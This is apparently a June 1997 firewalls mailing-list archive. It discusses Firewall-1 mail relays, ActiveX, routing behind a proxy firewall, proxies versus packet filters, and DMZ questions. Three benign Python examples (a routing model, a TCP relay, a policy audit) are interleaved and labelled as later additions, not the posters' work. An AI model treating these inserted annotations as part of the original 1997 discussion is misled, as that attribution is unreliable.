        "'firewalls@GreatCircle.COM'" 
Subject: RE: CheckPoint Firewall-1 V. 2.1
Date: Tue, 10 Jun 1997 08:24:36 +1200
X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The SMTP Security Server from Firewall 1 V3.0 can parse any of the SMTP
message header fields.

In addition, you can do wildcard matches and rewriting actions (eg,
change user@xyz.com to user@zyx.com)

There is also a hook into a Cheyenne Innoculan add-in supplied with
V3.0, although it doesn't scan attachments.

Documentation isn't great, but it's not too difficult to set up.

I take your point about the NT SMTP PO, although maybe putting it in a
DMZ and controlling access to it is better than just letting SMTP
through to the secure side for Checkpoint 2.1 users.

Putting an Exchange Server in the DMZ would be better, but expensive and
a pain if you want it to be part of your internal Exchange Site.

The idea of letting the appropriate NETBt calls for Exchange through the
firewall doesn't thrill me, although there is a paper on it on the
Checkpoint Web site. ( http://www.checkpoint.com )

Rgds,
Rob Edkins
Systems Consultant
Axon Computertime
E-Mail: edkinsr@axon.co.nz


>-----Original Message-----
>From:	Craig Brozefsky [SMTP:craig@onshore.com]
>Sent:	Monday, June 09, 1997 6:04 PM
>To:	Edkins, Rob - Axon AKL
>Cc:	'martin@nii.ncb.gov.sg'; 'Francisco Lopez (Infovia)';
>'firewalls@GreatCircle.COM'
>Subject:	RE: CheckPoint Firewall-1 V. 2.1
>
>On Mon, 9 Jun 1997, Edkins, Rob - Axon AKL wrote:
>
>> Upgrade to version 3.0 of Firewall 1 and use the SMTP Security Server
>> feature.
>> 
>> This acts as an SMTP Relay, accepting the mail, then queuing it on.
>
>Does it perform address parsing, etc.?
>
>> Big advantage of the security server is that nobody from outside touches
>> your Exchange box directly.
>
>Yup.
>
>> Yet another way would be to install the SMTP postoffice from the NT4
>> Server Resource kit onto your v2.1 firewall and configure this as a
>> relay.
>
>I think that would be a really bad idea.  Do not put code not specifically 
>designed to operate in a secure environment on a firewall.  NT4 postoffice 
>is not my idea of 'secure' smtp service and I certainly would not want it 
>running on a firewall.
>
>Craig Brozefsky              craig@onshore.com
>onShore Inc.                 http://www.onshore.com/~craig
>Development Team             p_priority=PFUN+(p_work/4)+(2*p_cash)
>

From owner-firewalls-outgoing  Tue Jun 10 04:12:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05646 for firewalls-outgoing; Mon, 9 Jun 1997 13:24:32 -0700 (PDT)
Received: from mail.rc.on.ca ([207.176.151.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05609 for ; Mon, 9 Jun 1997 13:24:11 -0700 (PDT)
Received: by mail.rc.on.ca with Internet Mail Service (5.0.1458.11)
	id ; Mon, 9 Jun 1997 15:56:24 -0400
Message-ID: 
From: Russ 
To: cowboy@home.byelex.nl, "'Adam Shostack'" 
Cc: firewalls@GreatCircle.COM
Subject: RE: Hosting ActiveX applets
Date: Mon, 9 Jun 1997 15:56:23 -0400
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1458.11)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unlike some opinions, I fail to see how the web has ever been anything
other than an attempt to swing you one way or another. Sure, you could
compare it to communism and say that it's always intended to be
vendor-neutral bliss, but like communism, it typically fails
implementation or beta trials.

Unlike communism, there's nothing cramming anything down your throat
(other than your management...;-]) so you're pretty much free to do what
makes sense to you and your company.

If you were trying to market a support application for your Win95-based
application, you probably couldn't give a rat's ass that the Mac or
Solaris users might not use it. Further, if you can find a way to
securely implement some incredible functionality using ActiveX why not
use it?

Like most things, there are always going to be some sites that block
your applet, and you're going to block out a segment of your viewers
from being able to use it (the amount vastly differs according to the
demographics of your audience, my site http://ntbugtraq.rc.on.ca has a
viewer community that is fully 90% IE users).

So whether or not it's "really cool" to be a communist may still be a
question for you, but the answer to your question is that serving up
ActiveX objects is no different than serving up any file from your web
site. They download it and it runs on their machine. If you provide some
server to interact with your application (not your web server) then the
issue is different, but if you merely supply them with the object and
maybe some data, you're fine.

Too bad you can't ask a security question and get a security answer,
instead of some hype borne out of frustration.

>We had independence from proprietary standards.

Geez, you make it sound like it was bliss. When exactly was this nirvana
anyway? Before or after RealAudio? Too bad Microsoft came along and
totally destroyed the web, eh? After all, it was Microsoft that invented
HTML-based SMTP, wasn't it? or was it?

>The real reason to not use ActiveX is because you probably
>don't need to

Wow, this is astute. Since when did need have to be the only reason?

>, and you're segmenting out your marketplace to pay
>homage to a vendor.

Do you honestly believe what you wrote here Adam? Do you honestly
believe that all of the people writing ActiveX objects are doing so
because they want to pay homage to Microsoft? Maybe they just want to
leverage something they already have written and don't feel like
re-writing the thing in Java, amongst a hundred other reasons that don't
involve laying tribute at Microsoft's feet.

>Also, there are all sorts of security problems
>with Microsoft's implementations.

Um, with the browser, right? After all, ActiveX at the server is nothing
more than a data file, isn't it, which was, after all, the poster
question. But I suppose one must, as you obviously do, consider the
possibility of someone writing a secure object impossible.

>Many firewalls filter ActiveX, just like you do(?).

Really? I didn't think we had gotten to the stage of "many" yet Adam.
Not that they shouldn't offer the option, or that people shouldn't
employ the option if it's there, I just didn't think there were that many
that did yet.

>So why are you creating web pages that your own company
>wouldn't allow in?

Probably because most do not block ActiveX.

BTW, I'm not calling anyone a communist here, it was just a convenient
analogy.

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security
owner of the NTBugTraq mailing list:
http://ntbugtraq.rc.on.ca/index.html


From owner-firewalls-outgoing  Tue Jun 10 04:55:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA10444 for firewalls-outgoing; Mon, 9 Jun 1997 21:30:37 -0700 (PDT)
Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.40]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id VAA10426 for ; Mon, 9 Jun 1997 21:30:28 -0700 (PDT)
Received: from adia_dso ([194.170.24.20]) by ns2.emirates.net.ae (SMI-8.6/8.6) with SMTP id IAA25943; Tue, 10 Jun 1997 08:31:04 +0400
Message-Id: <3.0.1.32.19970609114754.005a9ff0@emirates.net.ae>
X-Sender: forster@emirates.net.ae
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Mon, 09 Jun 1997 11:47:54
To: bsdi-users@bsdi.com
From: Andrew & Terri Forster 
Subject: TCP/IP Addressing Problems with FireWall
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We purchased a "gauntlet-type" proxy server firewall to complete our
perimeter defences project, including connection to the Internet.

We are having problems with internal clients being able to see (ping) the
Firewall and with the BSDI FireWall box pinging internal machines across our
internal router.  I have prepared a rough diagram below, then some
explanations.

          I N T E R N E T 
                 |
                 |
          _______|_______
         |               |
         |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
         |_______________|
                 |
                 |
      ___________|_____________________________   194.bbb.ccc.* Network
                     |
                     |
                     |
            _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
           |                     |       Default Router  194.bbb.ccc.1
           |       Firewall      |
           |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
                     |
                     |
      _______________|_________________________  172.17.*.* Network (B Class)
               |                     |
               |               ______|______
               |              |  W95 Client |  172.17.30.13 B S/net
               |              |_____________|  Gateway 172.17.200.2
               |
               |
      _________|_____________________
     |     172.17.200.2              |
     |       Cisco Router            |____________________  172.20.*.*
     |       172.16.200.2            |                       (B Class)
     |____________|__________________|
                  |
                  |
      ____________|____________________________  172.16.*.* Network (B Class)
                                |
                                |
                           _____|_______
                          | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
                          |_____________|

Note this is a test implementation of our final IP addressing Plan.  Our
registered IP C Class is used on the outside of the FireWall proxy server
firewall 194.bbb.ccc.* and on the inside of the Firewall we use a 172.17.*.*
B class network to our internal Router which also has other non-internet
data feeds (eg 172.20.*.* above).  On the inside of this internal router we
are planning to use the IP address 172.16.*.* B Class network.

Our problem is that clients on the 172.16.*.* network cannot ping (see) the
firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
clients on the 172.17.*.* network can see the internal network only when
the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
it will not be able to see the Internet as all traffic is sent to the
inside not the outside.  The other external connections work fine as they
all refer to their Internal Router port as their default router (gateway).

Obviously I need to determine how to solve this so that the external
traffic is directed to the Internet by the firewall and inside traffic
correctly through the Router to the 172.16.*.* subnet.

Any Assistance would be appreciated

Thanks in Advance

AMF


==========================================================================
 Andrew M Forster       [GMT +4]           Email: forster@emirates.net.ae
 Phone: +9712 262556 or +9712 453613                  Fax:   +9712 465344
==========================================================================
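As an added illustration of the routing problem in the message above (this is not code from the poster or from the firewall product), the following Python model reproduces the diagram as per-node routing tables and walks a packet hop by hop, so the failing leg is visible. The addresses are stand-ins: 198.51.100.0/24 plays the poster's registered 194.bbb.ccc.0/24 and 203.0.113.5 is an arbitrary Internet host. The "fixed" variant adds the two routes the layout is missing: the firewall needs a route to the networks behind the internal router, and the internal router needs a default route toward the firewall's inside interface. The exact BSDI and Cisco commands are not shown here because the message does not give them.

```python
import ipaddress

# Constructed stand-ins: 198.51.100.0/24 plays the poster's registered
# 194.bbb.ccc.0/24 and 203.0.113.5 is an arbitrary host out on the Internet.
INTERNET_HOST = "203.0.113.5"


def node(name, ifaces, routes):
    """A host or router: its interface addresses and routing table.
    Routes are (network, next_hop); next_hop None means directly connected."""
    return {"name": name,
            "ifaces": {ipaddress.ip_address(a) for a in ifaces},
            "routes": [(ipaddress.ip_network(n), ipaddress.ip_address(h) if h else None)
                       for n, h in routes]}


def build_network(fixed):
    """The diagram from the post. fixed=False reproduces the reported setup;
    fixed=True adds the two changes that repair it."""
    fw = [("198.51.100.0/24", None), ("172.17.0.0/16", None), ("0.0.0.0/0", "198.51.100.1")]
    cisco = [("172.17.0.0/16", None), ("172.16.0.0/16", None), ("172.20.0.0/16", None)]
    if fixed:
        # the firewall learns the networks that sit behind the internal router ...
        fw += [("172.16.0.0/16", "172.17.200.2"), ("172.20.0.0/16", "172.17.200.2")]
        # ... and the internal router sends everything it does not know to the firewall
        cisco += [("0.0.0.0/0", "172.17.100.1")]
    return [
        node("internet", [INTERNET_HOST], [("198.51.100.0/24", "198.51.100.1")]),
        node("inet_router", ["198.51.100.1"],
             [("198.51.100.0/24", None), ("0.0.0.0/0", INTERNET_HOST)]),
        node("firewall", ["198.51.100.9", "172.17.100.1"], fw),
        node("cisco", ["172.17.200.2", "172.16.200.2", "172.20.200.2"], cisco),
        node("w95_inside", ["172.17.30.13"],
             [("172.17.0.0/16", None), ("0.0.0.0/0", "172.17.200.2")]),
        node("w95_far", ["172.16.30.11"],
             [("172.16.0.0/16", None), ("0.0.0.0/0", "172.16.200.2")]),
    ]


def lookup(n, dst):
    """Longest-prefix match in one node's table."""
    best = None
    for net, hop in n["routes"]:
        if dst in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, hop)
    return best


def trace(nodes, src, dst):
    """Forward a packet hop by hop. Returns (path of node names, outcome)."""
    owner = {a: n for n in nodes for a in n["ifaces"]}
    dst = ipaddress.ip_address(dst)
    cur = owner[ipaddress.ip_address(src)]
    path = [cur["name"]]
    for _ in range(16):
        if dst in cur["ifaces"]:
            return path, "delivered"
        r = lookup(cur, dst)
        if r is None:
            return path, "no route at " + cur["name"]
        hop = dst if r[1] is None else r[1]
        if hop not in owner:
            return path, "next hop %s unreachable from %s" % (hop, cur["name"])
        cur = owner[hop]
        path.append(cur["name"])
    return path, "routing loop"


def ping(nodes, src, dst):
    """Echo request src -> dst and the reply dst -> src; a ping needs both legs."""
    _, fwd = trace(nodes, src, dst)
    if fwd != "delivered":
        return "request lost: " + fwd
    _, rev = trace(nodes, dst, src)
    if rev != "delivered":
        return "reply lost: " + rev
    return "ok"


if __name__ == "__main__":
    for label, net in (("as posted", build_network(False)),
                       ("with routes added", build_network(True))):
        print(label)
        print("  172.16.30.11 -> firewall :", ping(net, "172.16.30.11", "172.17.100.1"))
        print("  172.17.30.13 -> Internet :", trace(net, "172.17.30.13", INTERNET_HOST)[1])
```

Run as posted, the request from 172.16.30.11 reaches the firewall but the reply follows the firewall's default route out to the Internet router, which is exactly the symptom described; and a 172.17 client that points at the Cisco has its Internet-bound packets dropped there for lack of a default route. With the two routes added both legs complete. Since the firewall is a proxy, Internet replies come back to its outside address, so the only return routes the outside world needs are to the registered block.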

From owner-firewalls-outgoing  Tue Jun 10 06:08:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA17020 for firewalls-outgoing; Mon, 9 Jun 1997 22:13:38 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA10116 for ; Mon, 9 Jun 1997 21:29:18 -0700 (PDT)
Received: from gargoyle.clark.net (gargoyle.clark.net [168.143.0.250]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id VAA00617 for ; Mon, 9 Jun 1997 21:13:59 -0700 (PDT)
Received: (qmail 14155 invoked by uid 500); 10 Jun 1997 04:16:15 -0000
Date: Tue, 10 Jun 1997 00:16:15 -0400 (EDT)
From: "Paul D. Robertson" 
X-Sender: proberts@gargoyle
To: Ryan Russell/SYBASE 
cc: firewalls 
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: <199706100103.SAA04287@notesgw2.sybase.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> Just to clear up some of your misconceptions:
> 
> The son of OOB attack is application specific,
> effecting only the Microsoft DNS server and the 
> Microsoft Service at port 139 (which I think is the
> NetBIOS port, not sure.)  It does not effect the
> TCP driver in general.

It was my understanding that the invalid TCP window size advertisement was 
a general TCP flaw in the MS stack.  The variant I'd heard of used the 
URG flag to bypass the sequence number checking with a packet that set 
the window size to an invalid number.  For that, no packets would reach the 
application layer at all.

I'll have to hack up some code and test it, and double check my sources.

> Think of it this way.. Say I discover that if I throw the
> word "fred" into the datastream of an HTTP connection
> Netscape will delete your harddrive.  You're telling me
> that there are proxies out there that automatically
> filter out the word fred?  Before I announce the attack?

No, I'm telling you that an application layer gateway doesn't pass TCP 
options into the internal network.  I specifically said lower layer 
protocols, if you continue to want to misrepresent that as an application 
layer problem, that's up to you.  I'll say it one more time, more 
clearly, just in case you really missed it:

An application layer gateway creates its own TCP connections, and doesn't 
pass low level transport problems to the clients behind it.  Since the 
application proxy controls its own connections into the protected 
network, and external transport layer packets don't go any further than 
its external interface, this makes it a non-issue for clients 
behind application layer gateways.  Only the gateway need be immune to 
invalid TCP window sizes (without sequence number validation if what I'm 
told is true, though in the case of a hostile, or compromised server, 
this doesn't make much difference).  Note this is TCP transport layer, 
*not* a higher level application transport layer (Eg. HTTP).

If you're relaying the connection, then the clients are vulnerable at the 
relay level.  If you're not, then only you are vulnerable.  Even if I 
make the assumption that the information I was given is incorrect, and 
the specific exploit isn't as I've been led to believe, it is still a 
vulnerability of relaying at the transport layer by a gateway.  At some 
point, checking and rewriting or dropping packets gets expensive enough that 
you may as well have spent your time hardening the stack, especially when 
the machine's remote services may need hardening anyway.  

The fact remains that if you took FW1 on Solaris, and the FWTK on the same 
platform, and were to allow NetBIOS in (not that it would be prudent in most 
cases), under FW1 the "protected" clients would be vulnerable to OOB, under a 
circuit level relay like plug-gw they wouldn't.  Plug-gw isn't even an 
application layer proxy, but illustrates the difference, and point quite 
clearly.  Just as relaying at the application layer opens you up to 
application layer attacks with a proxy (and a packet filter, stateful or 
not), relaying at the transport layer leaves you open to transport layer 
attacks.

Nuff said,


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280
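The point Paul makes above, and Darren's earlier one about the proxy's own OS absorbing the OOB segment, comes down to a relay owning two separate TCP connections. As an added example (not code from any of the posters, and not plug-gw itself), here is a minimal plug-gw style circuit relay in Python: it accepts the outside connection, dials its own connection to the inside host, and copies only the byte stream between them. The inside "protected host" is a stand-in echo server started in the same process so the example runs offline; the round trip function is there to show the two facts that matter, namely that payload arrives intact and that the inside host never sees the outside endpoint's connection at all.

```python
import socket
import threading


def _pump(src, dst):
    """Copy the in-band byte stream src -> dst until EOF.

    Only payload bytes cross the relay. The TCP segments that carried them
    (flags, urgent pointer, advertised window, options) are consumed by the
    relay host's own stack; dst is a separate connection the relay opened.
    """
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # propagate EOF, half-close style
        except OSError:
            pass


def _listen(host="127.0.0.1", port=0):
    """Listening socket on an ephemeral loopback port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s


def start_relay(inside_host, inside_port):
    """plug-gw style circuit relay: accept outside, dial inside, pump both ways.
    Returns the (host, port) the relay listens on."""
    lsock = _listen()

    def serve():
        while True:
            outside, _ = lsock.accept()
            # a brand new connection, sourced from the relay's own address
            inside = socket.create_connection((inside_host, inside_port))
            threading.Thread(target=_pump, args=(outside, inside), daemon=True).start()
            threading.Thread(target=_pump, args=(inside, outside), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()


def start_inside_echo(seen_peers):
    """Stand-in for the protected host (constructed for this example): echoes
    what it receives and records the address each connection came from."""
    lsock = _listen()

    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def serve():
        while True:
            conn, peer = lsock.accept()
            seen_peers.append(peer)
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()


def relay_roundtrip(payload):
    """Send payload through the relay to the inside host and collect the echo.
    Returns (echoed_bytes, outside_client_addr, addr_the_inside_host_saw)."""
    seen = []
    inside_addr = start_inside_echo(seen)
    relay_addr = start_relay(*inside_addr)
    with socket.create_connection(relay_addr) as c:
        client_addr = c.getsockname()
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        echoed = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            echoed += chunk
    return echoed, client_addr, seen[0]


if __name__ == "__main__":
    echoed, outside, inside_saw = relay_roundtrip(b"GET / HTTP/1.0\r\n\r\n")
    print("echoed back     :", echoed)
    print("outside client  :", outside)
    print("inside host saw :", inside_saw, "(the relay, not the client)")
```

The relay never looks at a TCP header: whatever the outside peer does at the transport layer is a matter between that peer and the relay host's stack, which is why only the gateway needs the hardening. The same structure is why the attack class Ryan describes (a hostile byte sequence the application itself mishandles) passes straight through: that is application data, and a circuit relay has no opinion about it.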




From owner-firewalls-outgoing  Tue Jun 10 06:10:56 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA03138 for firewalls-outgoing; Tue, 10 Jun 1997 05:59:30 -0700 (PDT)
Received: from hp00086.ina.de (hp00086.ina.de [159.51.6.8]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA03090 for ; Tue, 10 Jun 1997 05:59:14 -0700 (PDT)
Received: from hp00002.koi.ina.de (hp00002.ina.de)
	by hp00086.ina.de with ESMTP (1.37.109.18/INA-1.0-SER)
	id AA158907541; Tue, 10 Jun 1997 14:59:02 +0200
Received: from pc00874.ina.de
	by koi.ina.de with SMTP (1.37.109.24/INA-1.0)
	id AA079287520; Tue, 10 Jun 1997 14:58:40 +0200
Received: by pc00874.ina.de with Microsoft Mail
	id <01BC75AE.E2456810@pc00874.ina.de>; Tue, 10 Jun 1997 14:59:24 +0200
Message-Id: <01BC75AE.E2456810@pc00874.ina.de>
From: Basil McCrea 
To: "'firewalls@greatcircle.com'" 
Subject: RFC for Ports
Date: Tue, 10 Jun 1997 14:59:22 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Maybe a dumb question, but can anyone tell me which RFC describes which
port numbers correspond to which services?

TIA

Basil McCrea

From owner-firewalls-outgoing  Tue Jun 10 06:11:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA00288 for firewalls-outgoing; Tue, 10 Jun 1997 05:30:49 -0700 (PDT)
Received: from ns.ncsa.com (ns.ncsa.com [205.160.199.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA00218 for ; Tue, 10 Jun 1997 05:30:26 -0700 (PDT)
Received: from portal.ncsa.com (root@portal.ncsa.com [205.160.199.10]) by ns.ncsa.com (8.8.5/8.8.3) with ESMTP id IAA11634 for ; Tue, 10 Jun 1997 08:35:21 -0400
Received: from serv_10.ncsa.com (serv10.ncsa.com [172.20.200.10])
          by portal.ncsa.com (8.8.5/8.8.4) with SMTP
	  id IAA01871 for ; Tue, 10 Jun 1997 08:35:44 -0400
Received: by serv_10.ncsa.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63)
	id <01BC7579.2B9AF740@serv_10.ncsa.com>; Tue, 10 Jun 1997 08:34:54 -0400
Message-ID: 
From: Jonathan McCown 
To: "'firewalls@GreatCircle.COM'" ,
        "'BLeBlanc@igate.sprint.com'" 
Subject: RE: ISP Connection (mainly 3rd party FW services)
Date: Tue, 10 Jun 1997 08:34:53 -0400
X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

(Mariko Yashada's question was: value of, components of 3rd party
management of firewalls)
(most of Bob LeBlanc's discussion of 3rd party issues elided)
>
>[Bob noted]
>What standard services does the third party perform?  You (the customer)
>must have the ability to sit with the third party and "design a
>unique-to-you" security service.  YOU must be able to determine the
>rules.  

In my experience, a productive 3rd party "value add" is having the
"stated policy" of the firewall verified periodically-- and keeping this
audit-type function in the hands of a party other than the firewall
admin is a wise thing.   

We've found that what many sites _believe_ they have implemented as a
policy is remarkably different from what is actually happening on the
wire.  MJR's quote about "seatbelts worn around the neck" applies.

- Jon
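Jon's observation above is a testable one: the stated policy and the firewall's accept log are both data, and the gap between them can be computed. As an added example (not code from the poster or from any firewall product), the following compares a small stated policy against constructed accept records and reports every accepted flow no rule covers. The log format (`accept SRC DST PROTO DPORT`) and all addresses are constructed for the example.

```python
import ipaddress
from collections import namedtuple

Rule = namedtuple("Rule", "src dst proto dport")   # dport None matches any port
Flow = namedtuple("Flow", "src dst proto dport")


def rule(src, dst, proto, dport=None):
    return Rule(ipaddress.ip_network(src), ipaddress.ip_network(dst), proto, dport)


# The policy the site believes it has implemented (constructed for this example).
STATED_POLICY = [
    rule("10.0.0.0/8", "0.0.0.0/0", "tcp", 80),      # inside may browse
    rule("10.0.0.0/8", "0.0.0.0/0", "tcp", 443),
    rule("10.0.0.0/8", "10.1.1.53/32", "udp", 53),   # inside resolves via the internal DNS
    rule("0.0.0.0/0", "10.1.1.25/32", "tcp", 25),    # outside may deliver mail to the relay
]


def permitted(policy, flow):
    """True if some stated rule covers the flow."""
    src, dst = ipaddress.ip_address(flow.src), ipaddress.ip_address(flow.dst)
    return any(src in r.src and dst in r.dst and flow.proto == r.proto
               and (r.dport is None or flow.dport == r.dport)
               for r in policy)


def parse_accept_log(text):
    """Parse constructed firewall records of the form 'ACTION SRC DST PROTO DPORT'.
    Only 'accept' lines are evidence of what actually got through."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "accept":
            flows.append(Flow(parts[1], parts[2], parts[3].lower(), int(parts[4])))
    return flows


def audit(policy, log_text):
    """Return the accepted flows the stated policy does not permit: the gap
    between what the site believes and what is happening on the wire."""
    return [f for f in parse_accept_log(log_text) if not permitted(policy, f)]


# Constructed accept/drop records, as a firewall's log might show them.
OBSERVED = """\
accept 10.1.2.3 203.0.113.7 tcp 80
accept 10.1.2.3 10.1.1.53 udp 53
accept 198.51.100.9 10.1.1.25 tcp 25
accept 10.1.2.3 203.0.113.7 tcp 23
accept 198.51.100.9 10.1.1.25 tcp 139
drop 198.51.100.9 10.1.2.3 tcp 139
"""

if __name__ == "__main__":
    for f in audit(STATED_POLICY, OBSERVED):
        print("accepted but not in stated policy:", f)
```

Two of the accepted flows (outbound telnet from the inside, and port 139 reaching the mail relay from outside) are not covered by any stated rule, which is precisely the kind of drift a periodic third-party check is meant to catch. The same comparison works against a packet capture taken outside the firewall, which is the stronger form of the audit because it does not depend on the firewall's own logging being right.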

From owner-firewalls-outgoing  Tue Jun 10 06:26:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA04770 for firewalls-outgoing; Tue, 10 Jun 1997 06:12:11 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA04741 for ; Tue, 10 Jun 1997 06:11:55 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4)
	id JAA20454; Tue, 10 Jun 1997 09:10:16 -0400
Message-ID: <339D5238.ABCA8E2A@unifiedtech.com>
Date: Tue, 10 Jun 1997 09:10:16 -0400
From: Mike Jones 
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Geoff Breach 
CC: firewalls@greatcircle.com
Subject: Re: DHCP and Firewall 1
X-Priority: 3 (Normal)
References: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com> <339cc303.680912366@news>
Content-Type: multipart/mixed; boundary="------------4A6AF6B824BB52C1FBB9A2A3"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is a multi-part message in MIME format.
--------------4A6AF6B824BB52C1FBB9A2A3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Geoff Breach wrote:
> On Mon,  9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch)
> wrote:
> >I have a Windows NT machine running DHCP  I want to be able from
> >that one machine to be able to get out to AOL but since its ip
> >address keeps changing  I can't make a rule based on his ip address.
> >keeps changing
> Only one way. Keep its IP address from changing. If you configure
> your DHCP server to always hand out the same address to that
> machine's MAC address, you get a middle ground between the benefits
> of DHCP and the benefits of fixed addressing.

Not so. You can use user authentication on the outbound FTP
session.
 
>  Yeah, there are other ways, authenticate, etc, but too much
> trouble IMHO.

Too much trouble? For a single user? If it were for 50 users,
then yeah, but for one it's no biggie.

As far as that goes, if you are using a reasonably large (say,
a month or more) lease time on your DHCP server the IP address
of the machine you're working on will never change unless you
go off the network (e.g., don't turn the machine on) for over
a month. So the idea of doing it by IP address isn't completely
out of the question. DHCP doesn't have to be minute-by-minute
dynamic in most environments to be useful.

--
	Mike Jones
	Sr. Technology Advisor
	UNIFIED Technologies
--------------4A6AF6B824BB52C1FBB9A2A3
Content-Type: text/x-vcard; charset=us-ascii; name="vcard.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Mike Jones
Content-Disposition: attachment; filename="vcard.vcf"

begin:          vcard
fn:             Mike Jones
n:              Jones;Mike
org:            Unified Technologies
adr:            ;;105 Jordan Road;Troy;NY;12180;US
email;internet: mike.jones@unifiedtech.com
title:          Sr. Technology Advisor
tel;work:       (518) 283-1003
tel;fax:        (518) 283-1189
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
end:            vcard


--------------4A6AF6B824BB52C1FBB9A2A3--


From owner-firewalls-outgoing  Tue Jun 10 06:41:59 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07835 for firewalls-outgoing; Tue, 10 Jun 1997 06:36:51 -0700 (PDT)
Received: from gibraltar.drco.com (gibraltar.drco.com [206.0.12.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07825 for ; Tue, 10 Jun 1997 06:36:44 -0700 (PDT)
Received: from fim.dillon.com ([5.5.5.11]) by gibraltar.drco.com
          (Netscape Mail Server v2.0) with ESMTP id AAA3811
          for ; Tue, 10 Jun 1997 09:36:15 -0400
Received: from bogdan.dillon.com ([5.5.5.134]) by fim.dillon.com
          (Netscape Mail Server v2.0) with ESMTP id AAA6591;
          Tue, 10 Jun 1997 09:37:36 -0400
Message-ID: <339D5831.8A959A3F@drco.com>
Date: Tue, 10 Jun 1997 09:35:46 -0400
From: Dan Anghelescu 
Reply-To: danghelescu@drco.com
Organization: Dillon Read & Co., Inc.
X-Mailer: Mozilla 4.0b5 [en] (Win95; I)
MIME-Version: 1.0
To: Costa Simona 
CC: "'Firewalls@GreatCircle.com'" 
Subject: Re: DMZ
X-Priority: 3 (Normal)
References: 
Content-Type: text/plain; charset=iso-8859-1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Costa Simona wrote:

> Hi everybody!
>
> I'm looking for some documentation concerning DMZ, just to explain to
> the boss what it is, how is configured and so on.
>
> Can any one help?
> Thank you in advance.
>
> Simona

 O'Reilly has some very good books on firewalls. Check
http://www.ora.com/catalog/fire

DAn


